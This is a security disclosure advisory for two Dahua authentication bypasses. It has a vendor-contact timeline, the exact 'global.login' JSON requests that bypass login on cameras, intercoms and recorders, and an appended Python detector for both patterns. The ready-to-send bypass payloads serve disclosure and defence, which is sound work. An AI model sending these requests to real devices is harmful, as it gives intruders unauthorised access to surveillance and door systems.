Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis (2021)
Limited Disclosure: September 6, 2021
Full Disclosure: October 6, 2021
PoC: https://github.com/mcw0/DahuaConsole

-=[Dahua]=-

Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957
Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware

-=[Timeline]=-

June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)
June 17, 2021: Sent reminder to Dahua PSIRT
June 18, 2021: Asked IPVM for help to get in contact with Dahua
June 18, 2021: Received ACK from IPVM, told they sent note to Dahua
June 19, 2021: ACK received from Dahua PSIRT, asked for additional details
June 19, 2021: Additional details including PoC sent
June 21, 2021: ACK received, vulnerabilities confirmed
June 23, 2021: Dahua PSIRT asked for "coordinated disclosure"
June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now
June 24, 2021: Received CVE-2021-33044, I asked about the second CVE
July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure"
July 04, 2021: Confirmed "coordinated disclosure", once again
July 05, 2021: Dahua PSIRT tried to convince me of "Full Disclosure" for vendor only, and "Limited Disclosure" for the outside world
July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021
August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note
August 30, 2021: Sent my "Limited Disclosure" note
September 1, 2021: Dahua PSIRT informed about the release of their Security Advisory and firmware updates
September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices
September 2, 2021: Dahua PSIRT pointed to the overseas website, asked for what models I have so Dahua could release firmware
September 2, 2021: Refused to provide details, as I do expect to find firmware on their website
September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches
September 6, 2021: Limited Disclosure
October 6, 2021: Full Disclosure

-=[NetKeyboard Vulnerability]=-

CVE-2021-33044

Vulnerability:
"clientType": "NetKeyboard",

Vulnerable device types: IPC/VTH/VTO (tested)
Vulnerable Firmware: Those devices that do not support "NetKeyboard" functionality (older than June 2021)
Protocol: DHIP and HTTP/HTTPS

Details:
Setting the above "Vulnerability" value on the "Vulnerable device types" during the 1st or 2nd "global.login" sequence will simply bypass authentication.

Successful bypass returns:
{"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}

[Example]
{
  "method": "global.login",
  "params": {
    "userName": "admin",
    "loginType": "Direct",
    "clientType": "NetKeyboard",
    "authorityType": "Default",
    "passwordType": "Default",
    "password": "Not Used"
  },
  "id": 1,
  "session": 0
}

-=[Loopback Vulnerability]=-

CVE-2021-33045

Vulnerability:
"ipAddr": "127.0.0.1",
"loginType": "Loopback",
"clientType": "Local",

Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)
Vulnerable Firmware: Firmware versions older than beginning/mid 2020
Protocol: DHIP

Details:
Setting the above "Vulnerability" values on the "Vulnerable device types" during the 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.

Successful bypass returns:
{"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}

[Example]
Random MD5 with l/p: admin/admin
{
  "method": "global.login",
  "params": {
    "userName": "admin",
    "ipAddr": "127.0.0.1",
    "loginType": "Loopback",
    "clientType": "Local",
    "authorityType": "Default",
    "passwordType": "Default",
    "password": "[REDACTED]"
  },
  "id": 1,
  "session": 0
}

Plain text with l/p: admin/admin
{
  "method": "global.login",
  "params": {
    "userName": "admin",
    "ipAddr": "127.0.0.1",
    "loginType": "Loopback",
    "clientType": "Local",
    "authorityType": "Default",
    "passwordType": "Plain",
    "password": "admin"
  },
  "id": 1,
  "session": 0
}
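The two login patterns above can be turned into a simple detection for network captures or device-facing proxy logs. As an added example (not part of this advisory or of DahuaConsole), the Python below classifies extracted "global.login" JSON bodies and flags both bypass markers, treating a "Loopback" login that arrives from a non-loopback peer as the clearest CVE-2021-33045 signal; the sample requests, the "Web3.0" clientType in the benign sample and the "::1" address are constructed assumptions.

```python
import json
from typing import List, Optional

# Markers taken from the advisory: CVE-2021-33044 uses clientType
# "NetKeyboard"; CVE-2021-33045 uses loginType "Loopback" + clientType
# "Local" with ipAddr "127.0.0.1". Treating "::1" the same is an assumption.
LOOPBACK_ADDRS = {"127.0.0.1", "::1"}


def classify_login(body: str, src_ip: Optional[str] = None) -> List[str]:
    """Return the CVEs whose bypass pattern this global.login body matches.

    src_ip is the peer address if known: a "Loopback" login that did not
    arrive from loopback (or whose source is unknown) gets flagged.
    """
    try:
        req = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return []  # not JSON at all: nothing to classify
    if not isinstance(req, dict) or req.get("method") != "global.login":
        return []
    params = req.get("params") or {}
    hits: List[str] = []
    if params.get("clientType") == "NetKeyboard":
        hits.append("CVE-2021-33044")
    claims_loopback = (params.get("loginType") == "Loopback"
                       and params.get("clientType") == "Local"
                       and params.get("ipAddr") in LOOPBACK_ADDRS)
    if claims_loopback and src_ip not in LOOPBACK_ADDRS:
        hits.append("CVE-2021-33045")
    return hits


def login_body(**params) -> str:
    """Build a constructed global.login request body for testing."""
    base = {"userName": "admin", "authorityType": "Default", "passwordType": "Default"}
    return json.dumps({"method": "global.login", "params": {**base, **params},
                       "id": 1, "session": 0})


# Constructed sample traffic as (source address, body): a normal-looking
# login first, then one request per bypass pattern described above.
SAMPLE = [
    ("192.0.2.10", login_body(loginType="Direct", clientType="Web3.0", password="<hash>")),
    ("192.0.2.10", login_body(loginType="Direct", clientType="NetKeyboard",
                              password="Not Used")),
    ("192.0.2.11", login_body(ipAddr="127.0.0.1", loginType="Loopback",
                              clientType="Local", passwordType="Plain",
                              password="<password>")),
]
```

Running classify_login over each SAMPLE entry yields no finding for the first request and one CVE identifier for each of the other two; the same "Loopback" body seen with a source address of 127.0.0.1 is not flagged.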